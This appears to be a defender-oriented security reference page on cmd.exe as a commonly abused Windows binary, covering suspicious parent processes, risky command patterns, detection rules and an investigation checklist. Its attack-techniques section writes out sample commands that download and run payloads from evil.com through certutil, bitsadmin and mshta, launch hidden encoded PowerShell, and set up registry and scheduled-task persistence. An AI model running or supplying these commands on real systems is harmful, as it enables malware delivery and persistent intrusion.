C
High RiskWindowsLegitimateCommonly Abusedcmd.exeSYSTEM UTILITYcmd.exe - Windows Command Interpreter Security Analysis
cmd.exe is the Windows Command Interpreter providing command-line access to the operating system. It is a critical LOLBin heavily abused for execution, payload delivery, and persistence. Virtually every attack chain uses cmd.exe at some point.
Risk Summary
HIGH priority. cmd.exe is used in nearly every attack. Focus on: unusual parent processes, encoded commands, network download attempts, and persistence mechanisms.
Overview
What is cmd.exe?
cmd.exe is the Windows Command Interpreter (Command Prompt).
Security Significance
- Universal Abuse: Used in virtually every attack
- LOLBin: Living-off-the-Land Binary
- Payload Delivery: Downloads and executes payloads
- Persistence: Establishes persistence via registry/tasks
Normal Behavior
Normal Behavior
Expected Parents
| Parent | Context |
|---|---|
| explorer.exe | User launches CMD |
| services.exe | Service execution |
| svchost.exe | Scheduled tasks |
Suspicious Parents
| Parent | Risk |
|---|---|
| winword.exe | CRITICAL - Macro execution |
| excel.exe | CRITICAL - Macro execution |
| outlook.exe | CRITICAL - Email exploit |
| iexplore.exe | HIGH - Browser exploit |
Common Locations
C:\Windows\System32\cmd.exeC:\Windows\SysWOW64\cmd.exeSuspicious Indicators
Legitimate vs Suspicious
SUSPICIOUS PATTERNS
Parent: Office apps, browsers
Command: /c powershell, /c certutil
/c bitsadmin, /c mshta
Network: Download attempts
High-Risk Commands
| Pattern | Risk |
|---|---|
| cmd /c powershell -enc | CRITICAL |
| cmd /c certutil -urlcache | HIGH |
| cmd /c bitsadmin /transfer | HIGH |
| cmd /c echo | base64 decode |
Abuse Techniques
Attack Techniques
Technique #1: Payload Execution
cmd /c powershell -nop -w hidden -enc [base64]
cmd /c mshta http://evil.com/payload.hta
Technique #2: Download and Execute
cmd /c certutil -urlcache -f http://evil.com/mal.exe c:\temp\mal.exe && c:\temp\mal.exe
cmd /c bitsadmin /transfer job http://evil.com/mal.exe c:\temp\mal.exe
Technique #3: Persistence
cmd /c reg add HKCU\...\Run /v Malware /d payload.exe
cmd /c schtasks /create /tn "Update" /tr payload.exe /sc onlogon
Detection Guidance
Detection Strategies
Priority #1: Suspicious Parent
Process = "cmd.exe" AND
Parent IN ("winword.exe", "excel.exe", "outlook.exe")
→ ALERT: CRITICAL
Priority #2: Download Commands
CommandLine CONTAINS ("certutil -urlcache", "bitsadmin /transfer", "Invoke-WebRequest")
→ ALERT: HIGH
Priority #3: Encoded Commands
CommandLine CONTAINS "powershell" AND "-enc"
→ ALERT: HIGH
Remediation Steps
Remediation
- Capture command line
- Identify malicious payload
- Check for persistence
- Remove downloaded files
- Hunt for lateral movement
Investigation Checklist
Investigation Checklist
- Verify cmd.exe path (System32)
- Review parent process
- Analyze command-line arguments
- Check for download activity
- Review child processes
- Look for persistence mechanisms